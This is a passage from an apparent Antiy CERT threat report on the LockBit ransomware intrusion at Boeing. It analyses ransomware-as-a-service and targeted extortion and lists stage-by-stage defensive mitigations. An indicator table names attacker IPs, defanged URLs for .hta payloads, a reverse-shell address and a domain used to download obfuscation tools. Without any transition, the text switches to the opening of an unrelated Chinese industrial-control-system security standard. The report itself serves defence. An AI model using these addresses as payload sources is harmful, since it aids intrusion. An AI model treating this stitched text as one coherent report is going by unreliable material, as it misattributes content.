——基于身份+权限+访问控制的合规体系极易被突破。 统一的身份认证机制、权限管理和访问控制机制是安全合规体系的重要基石。特别是统一身份认证在支撑了安全的情况下,又带来了使用上的便利性。但波音事件攻击者较容易地进行了相关凭证和身份的窃取,之后便利用这些凭证进行攻击和横向移动。由于相关行为不是一般性的探测扫描,而本身就是基于绑定凭证的定向植入与投放,导致攻击过程中波音方面完全无感。这说明在没有有效的、细粒度的感知和敏捷闭环运营能力支撑下,身份权限机制一旦被突破,就反过来成为了攻击者的掩护,从而使攻击者在整个合规体系中畅行无阻。 ——混合执行体攻击越来越普遍。 在针对波音的攻击中的工具中,包括漏洞利用工具、勒索软件,还包括开源和商用工具。在一些类似的定向勒索或APT级定向攻击中,基于攻击装备清单的梳理,往往同样有很大比例不再是传统意义上的恶意代码,而是为正常的网络管理应用目的所编写的工具或脚本,其中不乏知名的开源工具和商业产品,这些开源工具和商用产品往往都带有发布厂商的数字签名。这种组合运用多种来源执行体的攻击,安天CERT称之为混合执行体攻击。这就使攻击从早期的基于免杀的方式对主机的突防,进一步走入到可以击破反病毒引擎+可信验证的双安全系统的混合执行体攻击。防范这种攻击,简单结合反病毒引擎+可信验证,显然是颗粒度不足的。 ——主机安全防护依然没有得到有效的强化。 尽管攻击者在攻击过程中以窃取的账户和凭证为掩护,但其攻击过程依然要完成在对应目标主机上的实际载荷部署,但在整个过程中,波音的防御体系几乎无感,这显示在主机侧对应的安全产品和运营能力的不足,也进一步印证了主机侧作为资产与业务的承载主体、作为攻击者要窃取和破坏的价值目标,其防护能力需要进一步加强。在国内这一问题更为严重:在数字化发展背景下,对“安全的基石回归主机系统侧”这一必然趋势认识不足,对主机侧的安全需求依然理解为合规性的主机杀毒软件或防护软件,并更倾向以低廉的价格而非更有效的能力去选择产品。同时,由于主机侧工作更复杂、细腻,牵扯与信息化和使用部门的关系更多,导致防御者不愿意在主机侧投入主要的安全成本和管理资源,这些都会导致最后一道安全防线越来越难以抵抗定向攻击。 5.2 RaaS+定向勒索的模式分析 勒索软件即服务(Ransomware as a Service,RaaS)是在2016年出现的。其运行模式是开发人员开发勒索程序,运营人员招收附属成员,附属成员利用各种方式投放勒索程序实现勒索攻击。在RaaS模式下发生的勒索攻击事件,每个事件可能都是独立的,因为用于勒索攻击的“基础设施”提供方和实施攻击者通常不是同一组织。通俗来说,RaaS提供方是“品牌方”,通过招收“品牌代理”的方式扩展附属成员用于投放“品牌产品”,并以产品带来的收益进行抽成分红。由于勒索软件市场的产品较多,知名勒索软件利用其臭名昭著的特点,例如附属成员及攻击事件较多、事件影响力较大和成熟的运营体系等特点,广泛招收附属成员,附属成员也是看中其品牌效应,认为受害者会根据勒索攻击组织的影响力增加支付赎金的金额和可能性。LockBit正是采用RaaS模式运营的攻击组织,归属于该组织的勒索攻击事件非常多,但实际进行勒索攻击的是LockBit组织人员还是附属成员目前暂时无法明确。 勒索攻击组织基于攻击成本和攻击效益的商业运行模式,进行了自我改进。攻击方式从最初的广撒网寻找目标,逐渐地变成对有价值的攻击目标进行定向勒索。攻击者会在事先进行详细的情报搜集,以确保攻击的成功性和收益性,攻击者选择特定的目标通常是大型企业、政府机构或关键基础设施,通过对有价值的攻击目标进行定向勒索,通常会带来更多的勒索收益。当前较为流行的勒索软件攻击组织陆陆续续将定向勒索攻击作为主要攻击方式,例如BlackCat、Clop和LockBit等。 目前勒索软件的RaaS模式不仅仅是提供技术基础设施,而是结合宣传炒作、曝光窃取数据、拍卖窃取数据、将受害人举报到监管机构等方式对受害人实施压力,并制造新闻热点,提升品牌效应,从而以滚雪球方式让勒索组织形成臭名昭著的品牌效应。定向勒索模式针对高价值目标,RaaS的附属成员通过各种方式,包括购买0Day漏洞、研发高级恶意代码、收买企业内鬼和情报等手段提高突防能力,提升勒索载荷落地成功率。这种定向+RaaS的组合模式,形成“定向勒索+窃密+曝光+售卖”链条作业,胁迫受害者支付赎金从而实现获利。 5.3 对应的防御和治理思考 安天曾在《2020年网络安全威胁回顾与展望》[6]报告中提出定向勒索攻击能力“接近APT水平”。学者韦韬则指出[7],“对于网络勒索攻击的威胁认知大多数还停留于传统的独立个体层面,即具体的勒索软件。现在企业和机构面临的严重勒索威胁是定向勒索攻击,即Targeted Ransomware Attack,是APT+Ransomware的结合体。”“对于定向勒索攻击,备份已经不够用了。勒索是一鱼三吃:加密交钱恢复,敏感数据交钱不挂暗网(不交钱就卖),隐私信息勒索敏感个人。”安天CERT基于研判,提出进一步的风险预警:复杂的国际形势将使勒索攻击风险变得更加微妙,基于RaaS实施的伪装为勒索攻击,实际以毁瘫为目的的攻击行动会更多出现,从而会出现更多的“假旗”事件。 ——正确的认知是有效改善防御能力的基础。 目前国内对勒索攻击的防范,往往还停留在原有的勒索软件的阶段,还有许多人没有意识到勒索攻击已经是由持续定向入侵、窃取数据、加密数据瘫痪系统、勒索金钱、挖掘数据关联价值二次利用、贩卖数据、向监管机构举报、公开窃取数据所构成的一条价值侵害链,而且已经形成了一个规模极为庞大的犯罪产业。在这样的背景下,遭遇勒索攻击的风险已经不是简单的以数据损失和业务暂停为后果的形态,而是要付出失窃的所有数据均会被贩卖、公开等一系列的连锁风险。 从定向勒索攻击的作业方式来看,其在加密毁瘫行为触发前,是类似APT攻击的高度定制化的作业过程。攻击者或者是专业的攻击作业团队,有坚定的攻击意志、较高的攻击能力、充分的可利用漏洞资源,能掌握大量可利用的脆弱性情报和攻击入口资源,有的可能直接就是内部的攻击者。这也是依托RaaS的定向勒索攻击行动,面对有较强IT运营能力和防护投入的大型机构时仍能屡屡得手的原因。无论在勒索防护中扮演最后一道防线的主机系统防护,还是作为最后应对手段的备份恢复,都是防御体系中的单点环节,都在应对高水平定向攻击中担负着在本身能力范围内检测阻断攻击、降低攻击成功率、提高攻击成本、降低风险损失的局部作用,都无法以单点来对抗体系性的攻击。我们必须严肃的指出:将定向勒索攻击简单的等同于早期非定向扩散或广泛投放的勒索软件的威胁,将对抗勒索攻击简单看成是加密毁瘫VS备份恢复的单点对抗,是极为落后、片面的安全认知。如果没有一套完整的防护体系和运营机制,而是认为依靠数据备份恢复来应对勒索攻击。就如同只出场一名守门员,来对抗对方一支球队。 ——深入关注攻击活动的运营方式和社会规律有助于重新理解防御。 研究网络攻击活动不能脱离地缘政治安全要素,不能脱离经济社会土壤,要深入关注各种攻击活动的动机和运行方式。从犯罪获利的角度来看,获得了高额的勒索赎金对应着犯罪团伙能承担更高的犯罪成本,包括购买0Day漏洞、研发高级恶意代码、收买企业内鬼和情报等。从另一个角度来看,攻击者制造了“如果不缴纳赎金,受害人将承受远比赎金更高的综合损失”的困境。 网络安全对抗与防护已经是一种经济运行机制的对决。从防御侧来看,从预算投入方面,我们通常将网络安全在信息化的占比作为一个衡量标准,这使网络安全长期处在从属、配套和被压制状态。网络安全风险后果是否才应该是安全投入的第一衡量标准,也需要我们来思考。 这从对立面让我们思考网络安全投入与对标究竟应该以什么为衡量标准?我们认为从规划预算角度,网络安全必须是一套有独立评价参照系的独立预算口径,而不是简单设定为信息化的组成部分。网络安全投入合理的衡量标准是其运行资产价值和出现安全事件的风险损失,而并非信息化投入。通过在信息化中有限占比的方式来规划网络安全投入的传统思路已经成为安全能力建设的障碍。其逻辑错误在于错误定义了网络安全的保障对象——因为网络安全能力保障的并不是IT固定资产投入价值,而是业务和数据资产价值。对于高度依赖于信息系统运行的关基设施和政企机构,网络安全保障的是机构的全量价值,对应机构是一个企业,该价值就是企业的业务价值和营收价值,基于这个价值来判断网络安全投入的合理性,才是真正目标化的衡量标准,而不是仅与信息化投入关联所构建的成本化衡量标准。对于央企和关键基础设施部门,则还需要进一步评价对应的安全风险从企业自身风险连锁扩大到国家安全、社会治理安全和相关公民个人风险的情况。透过LockBit赎金规则,我们看到需要警惕的是:网络攻击者比网络防御者,先行一步认识到了这一规律。 ——客观的敌情想定是做好网络安全防御工作的前提。 从定向勒索攻击造成后果损失来看,我们必须改变对安全风险与价值的认知范式。由于定向勒索攻击已经形成了窃取数据、瘫痪系统和业务、贩卖数据和曝光数据的组合作业。其最大风险不只是系统和业务瘫痪无法恢复,而是同时面临被攻击企业的用户信息、关键数据、文档、资料、代码等核心资产被倒卖,被公开的风险,从而带来更大的连锁反应。从国内外安全领域长期以来的现实情况来看,很多政企机构改善自身安全的动力,并不来自于提升防护水平的能动性,很多企事业单位认为最可能发生的安全风险,不是遭遇攻击,而是因达不到合规标准,会遭到处罚。因此,安全防护领域构成了一套投入-合规-免责的低限建设运行逻辑。而定向勒索攻击所带来的后果,让IT决策者必须判断极限风险,并通过极限风险损失来判断网络安全的工作价值,如何避免业务长时间中断、数据彻底无法恢复、被窃取的数据资产被竞争对手购买,或因曝光严重贬值等极限情况,都是IT决策者和每一个机构必须应对的风险。 针对此类定向勒索攻击的防护必然不是以单点进行突围,必须从整体防护上出发,坚持关口前移,向前部署,构成纵深,闭环运营。最终通过防护体系以达成感知、干扰、阻断和呈现定向攻击方杀伤链的实战运行效果。 通过以定向勒索攻击为代表的案例,可以看到除了合规要求和既有存量之外,分析网络安全投入的关联要素还需要考虑:业务和数据资产的全局价值;攻击可能造成的最大风险损失;遭遇攻击者的可能性以及攻击者能力所能承担的攻击成本,以上因素是安全投入合理性的有效衡量标准。单纯依靠政企机构本身,往往只能知己、不能知敌人,难以完成高质量的评估,因此需要公共产品进行赋能。 ——高质量的技术分析是重要的战略支撑能力。 深入系统的威胁分析能力,一直是国内网络安全业界的一个能力长板。在长期的威胁分析斗争过程中(包括上世纪80年代后期的病毒样本分析、本世纪初开始的重大蠕虫事件分析和2010年前后系列APT事件分析),中国网络安全业界输出了大量高质量的分析成果,推动了技术创新、产品开发和持续运营,也有效支撑了相关公共安全领域决策,积累了一大批具有较高分析水平的工程师队伍;从产业层面来看,能进行有效威胁分析的安全企业越来越多。 但需要关注的是:1、在过去几年,高质量的分析成果有减少的趋势。在分析工作中,相对急功近利地追逐先发漏洞、热点事件,但不愿意长时间、大成本投入地持续跟踪深度威胁的情况比较普遍;2、规模型网络安全企业也将分析能力的保持和提升视为一种高昂的企业人力成本,而不愿意进行分析团队的扩建和体系性完善;3、在用户单位和管理部门中,也有一部分人存在着“分析报告就是企业软广”的偏颇认识,而忽视了这种分析工作对于准确判定威胁、溯源威胁行为体、研判防御的重点方向等方面具有极为重要的作用。 需要警惕的是,这些负反馈的作用下,分析能力作为我国产业长板能力会持续退化。 ——重新构建主机系统安全层面防御基石。 主机系统是业务和资产数据价值的承载者,也通常是攻击者攻击的最终目标。主机端防护能力的历史颇为悠久,从上世纪80年代中后期就已经开始普及终端杀毒软件,但今天我们在实际的分析、取证、复盘中,发现主机端安全反而成为了其中最薄弱的环节之一。在资产价值向云中主机(工作负载)不断迁移、泛在介入的背景下,防火墙等传统安全环节的价值被急剧弱化,加密流量的广泛使用进一步削弱了流量侧安全能力的可见性,这些因素都迫使安全的支撑基石必须重新回到主机系统侧,确保安全边界构建在每一台主机系统之上,并再将这些细粒度安全边界组织成为防御体系。 在主机的安全防御体系中,将主机环境塑造、恶意代码查杀、主动监测、介质管控、主机防火墙等大量的安全功能进行积木化的整合,实现按需弹性部署,从而在面对钓鱼投放、漏洞突防、恶意介质插入等攻击方式时,能够在主机侧形成包括主机边界防护、对象检测、行为管控、敏感数据保护的微观防御纵深。 ——需要构建执行体治理体系。 大量的混合执行体攻击打破了传统的“威胁检测+可信签名”的防御检测范式。攻击者更注重利用系统环境中已经存在的可利用执行对象(如系统shell),并将大量开源和商用正常工具作为实现攻击的路径和工具。这些开源和商用软件在政企机构中有着广泛应用,有的软件本身就带有合法甚至知名机构赋予的信誉,这就使我们面向执行体对象的识别颗粒度要至少到达每一个活跃和新增对象,最小化地缩窄执行入口,最大化地管控系统。这些工作既需要强大的共性能力赋能,也需要每一个关键基础设施和重要信息系统去建立自己的执行体治理基线和闭环运营机制。当然,这些工作离不开能支撑执行体治理的、有效的主机安全防护软件。 ——坚持构建动态、综合的防御体系而不是始终摇摆。 不断出现的各类重大安全威胁事件,容易产生类似最应重点防范勒索攻击还是APT攻击一类的疑惑。从水平上看,少数勒索攻击的前导攻击部分的水平,已经接近超高能力网空威胁行为体的APT攻击水准,而且勒索攻击将比APT攻击带来更直接和快速的经济损失与显性的机构信誉影响。定向勒索攻击确实是APT能力+勒索行为的结合体。但从另一角度看,由于勒索攻击组织必然要在一个相对短周期获益,其并无APT攻击者那样必须突破中心目标的关键意志力,其在长期潜伏、持久化和隐蔽作业方面,不会表现出APT攻击者的战略耐心。所以对每一个政企机构来说,其资产人员暴露面,一方面必然同时面对者多种攻击组织,但其可能遭遇的最高烈度或水平的攻击的判断,需要基于将其综合业务资产价值放到复杂的社会安全和地缘安全的背景下进行想定判断。 但必须指出的是,对大量机构来说,目前存在的并非在防御重点是APT攻击还是勒索攻击的选择问题,而是尚未完成防御基本面建设的问题。针对各种复杂的组合攻击,都需要防御层次的展开,都不存在“一招鲜,吃遍天”,所有资源、人力、策略投入的弹性调整,其前提都是已经完成了防御基础能力建设的基本动作,基本形成了动态综合、有效闭环的防御体系。这才能做到针对威胁变化实施针对性布防。可以说防御体系如能有效防御APT攻击,那么也能有效防御定向勒索攻击。 面对威胁挑战。战术上的高度重视和战略上坚定信心都是重要的。我们要坚信虽然定向勒索攻击防范难度很大,但依然有系统化的方法的和落地抓手。针对体系性的攻击,必须坚持关口前移,向前部署,构成纵深,闭环运营。提升攻击者火力侦察和进展到外围地带的发现能力,降低攻击方进入到核心地带的可能性。提升网络和资产可管理性是工作的基础:主动塑造和加固安全环境、强化暴露面和可攻击面的约束和管理、强化对供应链上游入口的管控、启动全面的日志审计分析和监测运行。构建从拓扑到系统侧的防御纵深,针对攻击者探测、投放、漏洞利用、代码运行、持久化、横向移动等行为展开层层设防,特别要建设好主机系统侧防护,将其作为最后一道防线和防御基石,构建围绕执行体识别管控的细粒度治理能力。最终通过基于防御体系实现感知、干扰、阻断定向攻击杀伤链的实战运行效果。 各个攻击阶段的防护策略建议如下: 初始访问 1) 技术手段:水坑攻击、利用面向公众的应用程序、利用外部远程服务、网络钓鱼、利用有效账户。 2) 针对对象:访问的网站、Web服务、RDP等远程服务、邮箱用户、系统账户。 3) 缓解措施 • 利用沙箱运行风险程序和通过浏览器、企业通讯、网盘等途径接收的文件。 • 部署Web应用程序防火墙。在Web应用服务器前置部署Web应用程序防火墙,后续及时更新防护规则。 • 采用强密码策略。密码长度至少为12个字符,定期更改密码,多个业务使用不同密码。 • 完善邮件服务器或公有邮件系统告警策略,添加收发外部邮件的安全性警告。 • 限制账户访问来源。根据业务场景限制Web应用、邮件、VPN等服务的访问源IP、端口,只允许具有TLS或其他加密保护的连接。 • 检查承载互联网业务的服务并禁用非业务要求的其它服务。 • 在不影响业务运行的情况下,持续更新相关系统及软件。 执行 1) 技术手段:利用命令和脚本解释器、利用第三方软件部署工具、利用系统服务。 2) 针对对象:PowerShell、第三方软件部署工具、系统服务。 3) 缓解措施 • 配置PowerShell脚本执行策略,只允许已签名的代码执行,可能会影响PowerShell相关业务。 命令:Set-ExecutionPolicy AllSigned • 启用PowerShell日志。 在Windows事件查看器中修改“应用程序和服务日志\Microsoft\Windows\PowerShell\Operational”日志类别的属性,确保日志记录为打开状态,且增加日志最大大小以存储更长时间的日志。 • 限制软件安装,设置应用程序控制策略。 利用终端安全防护产品设置只允许可信程序执行。利用本地安全策略中的软件限制策略 (SRP)、AppLocker设置软件执行限制,阻止非业务软件执行。 • 设置软件权限,启用UAC用户账户控制。 打开“控制面板\用户账户\更改用户账户控制设置”,将UAC级别设置为“始终通知”。 • 配置Windows 注册表。 要求 UAC 批准任何需要管理员权限的 PsExec 操作,以降低 PsExec 横向移动的风险。 持久化 1) 技术手段:利用自动启动执行引导或登录、有效账户。 2) 针对对象:自启动链、账户。 3) 缓解措施 • 加强账户有效期管理。按需设置账户有效期,及时清除不再使用的账户,定期修改账户凭据。 • 限制账户访问来源。根据业务场景限制Web应用、邮件、VPN等服务的访问源IP、端口,只允许具有TLS或其他加密保护的连接。 • 加强特权账户管理。定期审核域、本地账户及其权限级别,查找被对手通过获取特权账户凭据来获得广泛访问权限的可能。还应审核是否启用了默认账户,或者是否创建了未经授权的新本地账户。账户管理应遵循企业网<络设计和管理的最佳实践,以限制跨管理层的特权账户使用。 • 完善默认密码变更策略。使用默认用户名和密码的应用程序和设备应在安装后、部署到生产环境之前立即更改。 提权 1) 技术手段:滥用提升控制权限机制、利用自动启动执行引导或登录、利用域策略修改、利用有效账户。 2) 针对对象:系统权限管理机制。 3) 缓解措施 • 及时更新并修复提权漏洞。及时更新操作系统及应用程序版本,在不影响业务运行的情况下,修复权限提升漏洞。 • 加强权限管理和审核。完善权限管理制度和业务流程,避免权限被意外更改,避免出现错误的、不安全的配置。 • 在不影响正常业务情况下,禁用命令行和脚本执行。 • 加强用户账户审计。检查 Windows 系统上常见的 UAC 绕过风险点,在适当的情况下解决问题。 • 调节用户账户控制级别。在适当的情况下,使用 UAC 最高强制级别,降低UAC 绕过机会。 防御规避 1) 技术手段:执行范围保护、削弱防御机制、删除信标、混淆文件或信息。 2) 针对对象:防御机制。 3) 缓解措施 • 避免未知程序执行。应用本地安全策略、UAC、终端安全防护产品执行限制等,设置白名单程序以阻止未知程序执行。 • 配置远程日志服务并定期备份,避免日志被删除或篡改。 • 加强用户账户审计。定期检查账户角色权限,确保只有规定的用户角色才有权修改防御配置。 • 加强应用程序管控。管控组织既定应用程序之外的工具执行,确保仅在企业系统上使用和运行经过批准的安全应用程序。 • 限制文件、目录、注册表读写权限。配置适当的进程和文件权限,防止文件、目录、注册表被禁用或干扰安全/日志记录服务。 • 完善安全策略配置。在内部 Web 服务器上实施安全策略,强制使用 HTTPS防止不安全的连接。 • 加强用户账户管理。确保适当的用户权限到位,以防止对手禁用或干扰安全/日志记录服务。 凭证访问 1) 技术手段:暴力破解、从存储密码的位置获取凭证、操作系统凭证转储。 2) 针对对象:系统账户、lsass.exe进程、系统凭证存储区。 3) 缓解措施 • 配置安全策略,限制 NTLM 根据业务场景,在充分测试后设置组策略“计算机配置\Windows 设置\安全设置\本地策略\安全选项\网络安全:限制NTLM”相关选项 • 设置防火墙策略。根据业务需求,设置防火墙阻止445、137、138、149等端口的入站连接。 • 使用条件访问策略阻止从不合规的设备或 IP 范围之外进行登录。 • 使用多重身份验证。 发现 1) 技术手段:扫描网络服务、发现系统信息、发现系统地理位置。 2) 针对对象:系统信息、对外服务信息。 3) 缓解措施 • 禁用非业务端口,通过防火墙配置,禁用远程桌面服务的TCP端口3389及所有UDP端口。 • 正确划分网络。确保遵循正确的网络分段以保护关键服务器和设备。 • 利用网络入侵检测和防御系统监测和识别网络扫描、暴力破解等异常活动,检测和防止远程服务扫描。 横向移动 1) 技术手段:利用远程服务。 2) 针对对象:Web服务、RDP、远程连接。 3) 缓解措施 • 检查Active Directory、远程连接、Web服务配置,删除多余权限。 • 利用网络入侵检测和防御系统监测和识别网络扫描、暴力破解等异常活动。 • 定期扫描内部网络以查找可用服务,以识别新的和可能遭受攻击的服务。 • 遵循最小化权限原则,禁用或删除不适用的服务。 收集 1) 技术手段:压缩/加密收集的数据。 2) 针对对象:敏感数据。 3) 缓解措施 • 根据业务场景和资产情况,划分不同敏感度的数据类别,设置不同权限和访问策略。 • 加强用户接入监测强度。例如将VPN区域视为不可信网络区域,并提高其监测强度。 • 强化应用程序审计。执行系统扫描来识别未经授权的应用程序。 命令与控制 1) 技术手段:使用应用层协议、使用标准非应用层协议、使用协议隧道、利用远程访问软件。 2) 针对对象:网络协议、第三方远程访问软件(具备数字签名)。 3) 缓解措施 • 限制远程访问软件的使用。通过防火墙或网络监控设备限制访问远程软件相关IP及域名。 • 加强网络流量检测和响应,开展网络流量检测和响应识别,旨在通过识别网络侧恶意软件流量进行的网络入侵,并采取相应的防御措施,以减轻网络活动的风险。 • 完善网络流量过滤,防止跨网络边界使用不必要的网络协议。 • 正确配置防火墙和代理。将传出流量限制为仅通过适当的网络网关系统发送到必要的端口。还要确保主机仅配置为通过授权接口进行通信。 • 增加系统hosts文件配置。在“C:\Windows\System32\drivers\etc\hosts”,设置拦截远程软件相关域名。 • 加强远程访问程序控制。通过应用程序控制来减少安装、使用未经批准的远程访问软件。 数据渗出 1) 技术手段:自动渗出数据、使用Web服务回传。 2) 针对对象:数据。 3) 缓解措施 • 限制网络数据流出:采用Web 代理可用于强制执行外部网络通信策略,以防止使用未经授权的外部服务。 • 加强数据丢失防护。检测并阻止通过网络浏览器上传敏感数据到网络服务。 • 引入威胁情报。通过引入威胁情报,在已发现的零散信息中形成更多事件的线索,帮助组织发现和拦截下一次攻击。 影响 1) 技术手段:损毁数据、造成恶劣影响的数据加密、篡改可见内容、禁用系统恢复、禁用服务。 2) 针对对象:数据、系统配置、系统卷影副本、服务。 3) 缓解措施 • 数据备份。定期维护备份和恢复(至少每天或每周)。建议遵循 3-2-1 备份策略:在两种不同介质(例如磁盘和磁带)上拥有三份数据副本(一份生产数据副本和两份备份副本),其中一份副本保存在异地。通过物理介质(如数据磁带等)或其他措施保证备份数据无法被更改或删除。 • 预防端点有害行为。在 Windows 10 上,启用云保护和攻击面减少 (ASR) 规则以阻止类似勒索软件的文件执行。 • 完善操作系统配置。防止禁用“系统恢复”功能中涉及的服务或删除文件,确保使用以下命令启用 WinRE:reagentc /enable。 • 加强用户账户管理。将有权访问备份的用户账户限制为仅需要的用户账户。 • 远程实时备份系统日志及重要文件。 • 远程备份系统卷影副本。 • 监控敏感系统服务操作,特别是停止操作。 附表二:本次事件涉及到的IoCs IoCs 备注 192.229.221.95 Mag.dll会连接这个IP,该IP为dns0.org解析地址 193.201.9.224 从受感染系统FTP连接IP 62.233.50.25 hxxp://62.233.50.25/en-us/docs.html hxxp://62.233.50.25/en-us/test.html 51.91.79.17 Temp.sh内的IP地址 70.37.82.20 从一个已知的受损账户中发现 IP 正在访问 Altera IP 地址。LockBit 利用 Altera 远程管理工具,例如 Anydesk、TeamViewer等。 185.17.40.178 Teamviewer C2地址,与一家波兰服务提供商Artnet Sp. Zo.o建立了联系,IP地址所属波兰 185.229.191.41 Anydesk的C2地址 81.19.135.219 hxxp://81.19.135.219:443/q0X5wzEh6P7.hta hxxp://81.19.135.219/F8PtZ87fE8dJWqe.hta 172.67.129.176 adobe-us-updatefiles.digital解析的IP地址 104.21.1.180 adobe-us-updatefiles.digital解析的IP地址 81.19.135.220 受害系统日志发现的IP地址 81.19.135.226 受害系统日志发现的IP地址 141.98.9.137 Citrix Bleed的远程IP 54.84.248.205 fixme的IP地址 206.188.197.22 powershell日志中发现的反向shell连接IP地址 185.230.212.83 Zoho远程软件连接的IP地址 185.20.209.127 Zoho远程软件连接的IP地址 101.97.36.61 Zoho远程软件连接的IP地址 168.100.9.137 SSH协议端口转发 adobe-us-updatefiles.digital 用于下载混淆工具集 域名解析IP: 172.67.129.176 104.21.1.180 eu1-dms.zoho.eu Zoho远程软件域名 assist.zoho.eu Zoho远程软件域名 fixme.it 在线远程服务 unattended.techinline.net 在线远程服务 附表三:安天发布有关LockBit勒索软件的历史报告 时间 活动 参考链接 2021年9月20日 安天周观察发布《安天智甲有效防护LockBit 2.0勒索软件》报告。 https://www.antiy.cn/observe_download/observe_296.pdf 2022年01月03日 安天发布《2021年流行勒索软件盘点》报告,梳理LockBit 2.0家族概况,展示了LockBit组织相关攻击活动。 https://www.antiy.cn/research/notice&report/research_report/20220103.html 2023年01月30日 安天发布《2022年流行勒索软件盘点》报告,再次梳理LockBit家族概况,展示了LockBit组织2022年期间的相关攻击活动 https://www.antiy.cn/research/notice&report/research_report/20230130.html 2023年11月17日 安天发布《LockBit勒索软件样本分析及针对定向勒索的防御思考》报告,即本报告的1.0版本。 https://www.antiy.cn/research/notice&report/research_report/LockBit.html 附录四:安天为助力主管机构、客户和公众应对勒索攻击所作的部分工作 安天一直致力于提升客户有效防护能力,并和客户共同提升对安全的理解和认知。 安天长期持续跟踪勒索攻击的演进变化,持续发布威胁研判报告,在2006年6月14日截获分析了国内最早的勒索软件redplus(Trojan.Win32.Pluder.a),之后又发布《揭开勒索软件的真面目》[8](2015年)、《安天针对勒索蠕虫“魔窟”(WannaCry)的深度分析报告》[9]、《勒索软件Sodinokibi运营组织的关联分析》[10]和《关于美燃油管道商遭勒索攻击事件样本与跟进分析》[11]等重要报告,特别是在WannaCry(魔窟)勒索蠕虫大规模爆发事件前五个月,做出了勒索攻击将带动蠕虫回潮的预判[812]。在WannaCry勒索蠕虫的响应中,安天一方面快速跟进分析,同时为用户提供防护手册[13]和开机指南[14]并提供了免疫工具、专杀工具、内存密钥获取和恢复工具等。在“必加”(PETYA)伪装成勒索的毁瘫攻击中,也第一时间做出了其可能不是一起勒索攻击事件的准确判断。安天CERT持续跟踪各勒索软件家族和RaaS攻击组织,针对LockBit[15]、GandCrab[16]和Sodinokibi等流行勒索软件家族发布了样本分析报告及防护建议,特别是基于垂直响应平台推出了《从八个方面认识勒索攻击和危害》专题系列文章[17][18][19][20][21][22],助力政企客户和公众了解勒索攻击,提升防范意识。2021年,为加强勒索软件攻击防范应对,在工业和信息化部网络安全管理局指导下,中国信通院联合安天等单位编制发布了《勒索病毒安全防护手册》 [23],手册对如何防范勒索攻击提出了详细的清单化的建议。 安天基于自主研发的AVL SDK反病毒引擎支撑自身产品和引擎生态合作伙伴的恶意代码检测能力,对包括勒索软件在内的各类恶意代码工具进行精准检测和清除。安天智甲终端防御系统、睿甲云防护系统基于安天执行体治理的基本理念,协助客户塑造可信安全主机环境。安天智甲端侧构建了由系统加固、主机防火墙(HIPS)、扫描过滤、执行管控、行为防护、重点数据保护的组合安全机制,针对勒索攻击构成多个防护层次,特别重点数据保护机制,基于对批量文件读写的拦截,在其他安全机制均被绕过失效的情况下,尝试实现行为拦截和止损。当然,我们从来不相信网络安全存在银弹。我们致力于我们的引擎和每个产品都能在其作战位置最大化发挥价值,接受实战对抗的检验。相关内容,可以参考《安天产品助力用户有效防护勒索攻击》[24]进行了解。 附表五:报告中涉及的病毒百科词条 病毒名 病毒百科链接 Trojan/Win32.LockBit[Ransom] https://virusview.net/malware/Trojan/Win32/LockBit/Ransom?source=CERT-BoeingReport RiskWare/Win32.AnyDesk https://virusview.net/malware/RiskWare/Win32/AnyDesk?source=CERT-BoeingReport HackTool/PowerShell.ADRecon https://virusview.net/malware/HackTool/PowerShell/ADRecon?source=CERT-BoeingReport HackTool/Win32.Mimikatz https://virusview.net/pro/Mimikatz?source=CERT-BoeingReport https://virusview.net/malware/HackTool/Win32/Mimikatz?source=CERT-BoeingReport RiskWare/Win32.PsExec[RiskTool] https://virusview.net/malware/RiskWare/Win32/PsExec/RiskTool?source=CERT-BoeingReport RiskWare/Win32.ProcDump https://virusview.net/malware/RiskWare/Win32/ProcDump?source=CERT-BoeingReport
standards
信息安全技术 工业控制 系统安全控制应用指南 引 言 工业控制系统(ICS)[包括监控和数据采集系统(SCADA)、分布式控制系统(DCS)、可编程逻辑控 制器(PLC) 等产品]在核设施、航空航天、先进制造、石油石化、油气管网、电力系统、交通运输、水利枢 纽、城市设施等重要领域得到了广泛的应用, 随着信息技术的发展,特别是信息化与工业化深度融合以及物联网的快速发展,工业控制系统产品 越来越多地采用通用协议、通用硬件和通用软件,以各种方式与互联网等公共网络连接,传统信息系统 所面临的病毒、木马等威胁正在向工业控制系统领域不断扩散,工业控制系统的信息安全问题日益 突出。 工业控制系统安全控制应用指南是针对各行业使用的工业控制系统给出的安全控制应用基本方 法,是指导选择、裁剪、补偿和补充工业控制系统安全控制,形成适合组织需要的安全控制基线,以满足 组织对工业控制系统安全需求,实现对工业控制系统进行适度、有效的风险控制管理。 本标准适用于工业控制系统拥有者、使用者、设计实现者以及信息安全管理部门,为工业控制系统 信息安全设计、实现、整改工作提供指导,也为工业控制系统信息安全运行、风险评估和安全检查工作提供参考。 信息安全技术 工业控制 系统安全控制应用指南 1 范围 本标准提供了可用于工业控制系统的安全控制列表,规约了工业控制系统的安全控制选择过程,以 便构造工业控制系统的安全程序——一种概念层面上的安全解决方案。 本标准适用于: a) 方便规约工业控制系统的安全功能需求,为安全设计(包括安全体系结构设计)和安全实现奠 定有力的基础。 b) 指导工业控制系统安全整改中安全能力的调整和提高,以便能使工业控制系统保持持续安 全性。 本标准的适用对象是组织中负责工业控制系统建设的组织者、负责信息安全工作的实施者和其他 从事信息安全工作的相关人员。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注H 期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 22240—2008 信息安全技术 信息系统安全等级保护定级指南 GB/T 25069—2010 信息安全技术 术语 3 术语和定义 GB/T 25069-2010界定的以及下列术语和定义适用于本文件。 3.1 工业控制系统 industrial control system;ICS 工业控制系统(ICS) 是一个通用术语,它包括多种工业生产中使用的控制系统,包括监控和数据采 集系统(SCADA) 、分布式控制系统(DCS) 和其他较小的控制系统,如可编程逻辑控制器(PLC), 现已广 泛应用在工业部门和关键基础设施中。 3.2 监控和数据采集系统 supervisory control and data acquisition system;SCADA 在工业生产控制过程中,对大规模远距离地理分布的资产和设备在广域网环境下进行集中式数据 采集与监控管理的控制系统。它以计算机为基础、对远程分布运行设备进行监控调度,其主要功能包括 数据采集、参数测量和调节、信号报警等。SCADA 系统 一般由设在控制中心的主终端控制单元 (MTU) 、通信线路和设备、远程终端单元(RTU) 等组成。 3.3 分布式控制系统 distribution control system;DCS 以计算机为基础,在系统内部(组织内部)对生产过程进行分布控制、集中管理的系统。DCS 系统 一般包括现场控制级、控制管理级两个层次,现场控制级主要是对单个子过程进行控制,控制管理级主 要是对多个分散的子过程进行调度管理、数据采集和集中显示。 3.4 可编程逻辑控制器 programmable logic controller;PLC 